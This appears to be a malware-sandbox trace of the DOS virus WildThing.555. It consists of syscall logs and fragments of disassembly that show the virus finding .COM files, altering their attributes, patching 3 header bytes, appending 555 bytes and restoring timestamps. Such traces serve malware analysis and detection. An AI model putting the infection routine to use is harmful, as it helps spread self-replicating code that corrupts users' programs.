Sample viewer

vx.netlux.org/Virus.DOS.WildThing.555

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:31.835671669Z 26 PC: 12f82 | Set disk transfer address
2018-12-17T23:07:31.838032538Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-17T23:07:31.841748583Z 71 PC: 12e5d | Get current directory
2018-12-17T23:07:31.845176857Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-17T23:07:31.847887332Z 78 PC: 12f73 | Find first file
2018-12-17T23:07:31.855865019Z 78 PC: 12e6e | Find first file
2018-12-17T23:07:31.863202371Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T23:07:31.869402075Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T23:07:31.892553425Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:31.900358997Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T23:07:31.901841524Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:31.909102564Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:31.911965986Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:31.915132218Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:31.917349406Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-17T23:07:31.926832111Z 87 PC: 12f2a | Get or set file date and time
2018-12-17T23:07:31.928764213Z 62 PC: 12f2e | Close file
2018-12-17T23:07:31.944746577Z 67 PC: 12f38 | Get or set file attributes
2018-12-17T23:07:31.956237307Z 79 PC: 12e6e | Find next file
2018-12-17T23:07:31.960195648Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T23:07:31.966412874Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T23:07:31.977443991Z 61 PC: 12ec9 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:07:31.984682056Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T23:07:31.986538736Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:31.994002948Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:31.996081185Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:31.999274167Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.001438816Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-17T23:07:32.012169547Z 87 PC: 12f2a | Get or set file date and time
2018-12-17T23:07:32.014058408Z 62 PC: 12f2e | Close file
2018-12-17T23:07:32.022519853Z 67 PC: 12f38 | Get or set file attributes
2018-12-17T23:07:32.038459196Z 79 PC: 12e6e | Find next file
2018-12-17T23:07:32.041948625Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T23:07:32.048647778Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T23:07:32.060686598Z 61 PC: 12ec9 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:07:32.068198469Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T23:07:32.070259664Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:32.07827482Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.080223062Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:32.083745795Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.087226307Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-17T23:07:32.09598445Z 87 PC: 12f2a | Get or set file date and time
2018-12-17T23:07:32.097944555Z 62 PC: 12f2e | Close file
2018-12-17T23:07:32.107018052Z 67 PC: 12f38 | Get or set file attributes
2018-12-17T23:07:32.125611553Z 79 PC: 12e6e | Find next file
2018-12-17T23:07:32.131697974Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T23:07:32.141690458Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T23:07:32.156441366Z 61 PC: 12ec9 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:07:32.164390018Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T23:07:32.165901539Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:32.173981197Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.175863065Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:32.179189829Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.182489581Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-17T23:07:32.191331892Z 87 PC: 12f2a | Get or set file date and time
2018-12-17T23:07:32.192900631Z 62 PC: 12f2e | Close file
2018-12-17T23:07:32.202199391Z 67 PC: 12f38 | Get or set file attributes
2018-12-17T23:07:32.215105271Z 79 PC: 12e6e | Find next file
2018-12-17T23:07:32.218502037Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T23:07:32.225230294Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T23:07:32.237549682Z 61 PC: 12ec9 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:07:32.245336539Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T23:07:32.247015696Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:32.254576579Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.256238413Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:32.259165405Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.262202003Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-17T23:07:32.271720896Z 87 PC: 12f2a | Get or set file date and time
2018-12-17T23:07:32.27332383Z 62 PC: 12f2e | Close file
2018-12-17T23:07:32.283351008Z 67 PC: 12f38 | Get or set file attributes
2018-12-17T23:07:32.293938781Z 79 PC: 12e6e | Find next file
2018-12-17T23:07:32.296790993Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T23:07:32.304573602Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T23:07:32.315041359Z 61 PC: 12ec9 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:07:32.322189756Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T23:07:32.324287049Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:32.331830028Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.333638748Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:32.336738224Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.3392629Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-17T23:07:32.348884146Z 87 PC: 12f2a | Get or set file date and time
2018-12-17T23:07:32.350798154Z 62 PC: 12f2e | Close file
2018-12-17T23:07:32.359441772Z 67 PC: 12f38 | Get or set file attributes
2018-12-17T23:07:32.37020779Z 79 PC: 12e6e | Find next file
2018-12-17T23:07:32.372985511Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T23:07:32.38031574Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T23:07:32.391645157Z 61 PC: 12ec9 | Open file (Filename = 'PAH.COM')
2018-12-17T23:07:32.399238641Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T23:07:32.402353407Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:32.410658598Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.412742415Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:32.417324649Z 66 PC: 12f43 | Move file pointer
2018-12-17T23:07:32.420396273Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-17T23:07:32.429418132Z 87 PC: 12f2a | Get or set file date and time
2018-12-17T23:07:32.431844924Z 62 PC: 12f2e | Close file
2018-12-17T23:07:32.440587047Z 67 PC: 12f38 | Get or set file attributes
2018-12-17T23:07:32.451310976Z 79 PC: 12e6e | Find next file
2018-12-17T23:07:32.454437844Z 67 PC: 12eb5 | Get or set file attributes
2018-12-17T23:07:32.461509437Z 67 PC: 12ec2 | Get or set file attributes
2018-12-17T23:07:32.474276155Z 61 PC: 12ec9 | Open file (Filename = 'TEST.COM')
2018-12-17T23:07:32.481685253Z 87 PC: 12ed1 | Get or set file date and time
2018-12-17T23:07:32.484899685Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:32.491980295Z 87 PC: 12f2a | Get or set file date and time
2018-12-17T23:07:32.494002005Z 62 PC: 12f2e | Close file
2018-12-17T23:07:32.504728559Z 67 PC: 12f38 | Get or set file attributes
2018-12-17T23:07:32.515591229Z 79 PC: 12e6e | Find next file
2018-12-17T23:07:32.518637285Z 59 PC: 12e83 | Change current directory
2018-12-17T23:07:32.524344453Z 59 PC: 12e8d | Change current directory
2018-12-17T23:07:32.526491428Z 26 PC: 12f82 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:50.622585192Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:50.624940733Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:50.627478476Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:50.630836857Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:50.633651334Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:50.6528609Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:50.659828769Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:50.666502766Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:50.685847534Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:50.694968842Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:50.696641076Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:50.705071032Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:50.706993508Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:50.710321051Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.712768785Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:50.72450948Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:50.72619026Z 62 PC: 12f2e | Close file
2018-12-25T12:44:50.735115067Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:50.746416271Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:50.749560179Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:50.758132293Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:50.769011612Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:50.776559149Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:50.778594982Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:50.785981768Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.787202545Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:50.789898054Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.791794713Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:50.80117263Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:50.802783261Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:50.812218969Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:50.823663406Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:50.826582935Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:50.834216448Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:50.845044283Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:50.852449289Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:50.854729492Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:50.86196286Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.863500803Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:50.867083669Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.868948349Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:50.877722556Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:50.879918808Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:50.888930579Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:50.899723051Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:50.903081715Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:50.909667927Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:50.921437499Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:50.928776037Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:50.930836506Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:50.937889132Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.939289025Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:50.942691984Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.945532923Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:50.954666122Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:50.957930883Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:50.966874513Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:50.977972128Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:50.98186826Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:50.987989508Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:50.999305295Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.007651745Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.008711771Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.012731198Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.013911901Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.016147968Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.017430077Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.023087145Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.025624834Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.034093637Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.045103847Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.04814726Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.054287948Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.065023219Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.078659307Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.080514785Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.087584652Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.089456312Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.092287035Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.093953374Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.104256956Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.106231264Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.11492603Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.126989877Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.129779732Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.136584753Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.148325502Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.15560835Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.157012095Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.165012133Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.16674135Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.16962641Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.171721255Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.180550378Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.184943013Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.194905319Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.212804129Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.215472384Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.221666638Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.246285756Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.253693165Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.255241866Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.263435495Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.265000814Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.274000169Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.285990047Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.289189135Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:51.294251808Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:51.297664117Z 26 PC: 12f82 | Set disk transfer address (See above)
2018-12-25T12:44:51.299039801Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:44:53.505922994Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:44:53.509234316Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:44:53.512603139Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:44:53.516228985Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:44:53.529663282Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:44:53.532341286Z 62 PC: 91fc1 | Close file
2018-12-25T12:44:53.535525931Z 75 PC: 91fe0 | Execute program
2018-12-25T12:44:53.553816172Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:44:53.556466511Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:44:53.561447306Z 48 PC: c609 | Get DOS version
2018-12-25T12:44:53.565390138Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:44:53.570135073Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:44:53.572916523Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:44:53.577095217Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:53.582503714Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:53.58829407Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:44:53.600410387Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:44:53.602437647Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:44:53.604753142Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:44:53.629163709Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:44:53.633856837Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:44:53.635543693Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:53.637048685Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:53.638896275Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:53.640198143Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:53.641776374Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:44:53.656575689Z 62 PC: 8f8eb | Close file
2018-12-25T12:44:53.658605427Z 62 PC: 8f8f2 | Close file
2018-12-25T12:44:53.661009601Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.66404577Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.665831178Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.667512665Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.66933191Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.671559869Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.673206857Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.67517016Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.677331992Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.678936596Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.680539834Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.682544952Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.684026023Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.685491908Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.687100191Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.688870003Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.690928375Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.694123225Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.696053444Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.697570373Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.700208862Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.702431044Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.703955769Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.706914956Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.709211685Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.711625942Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.715362253Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.717195948Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.719018284Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.72173105Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:44:53.727374336Z 62 PC: 8f90e | Close file
2018-12-25T12:44:53.730023802Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:44:53.733578402Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:44:53.736007404Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:44:53.741392946Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:44:53.744664045Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:44:53.750239853Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:44:53.752192516Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:44:53.754803087Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:44:53.75725778Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:44:53.759095464Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:44:53.761827823Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:44:53.764266206Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:44:53.766104516Z 73 PC: 8fa11 | Release memory
2018-12-25T12:44:53.768983574Z 73 PC: 8efea | Release memory
2018-12-25T12:44:53.770614543Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:44:53.772475107Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:44:53.775448366Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:44:53.777558081Z 73 PC: 8f060 | Release memory
2018-12-25T12:44:53.779167082Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:44:53.790198334Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:44:53.79391178Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:44:53.796048456Z 62 PC: 8f0d1 | Close file
2018-12-25T12:44:53.798799037Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:44:53.812980437Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:44:53.813846636Z 48 PC: 12bee | Get DOS version
2018-12-25T12:44:53.815792777Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:44:53.817578602Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:44:53.818730226Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:44:53.820186367Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:44:53.821349012Z 72 PC: 1355d | Allocate memory
2018-12-25T12:44:53.822697831Z 25 PC: 13596 | Get default drive
2018-12-25T12:44:53.824827312Z 71 PC: 135ad | Get current directory
2018-12-25T12:44:53.827364743Z 59 PC: 135ba | Change current directory
2018-12-25T12:44:53.832897916Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:53.837186003Z 59 PC: 135d3 | Change current directory
2018-12-25T12:44:53.839721157Z 25 PC: 12d13 | Get default drive
2018-12-25T12:44:53.840952965Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:44:53.842873012Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:44:53.843766523Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:44:53.845652374Z 80 PC: 1301d | Set current PSP
2018-12-25T12:44:53.847687944Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:44:53.84866496Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:53.849473396Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:53.851212282Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:44:53.852642591Z 72 PC: 130ec | Allocate memory
2018-12-25T12:44:53.854044774Z 61 PC: 131b2 | Open file (Filename = '')
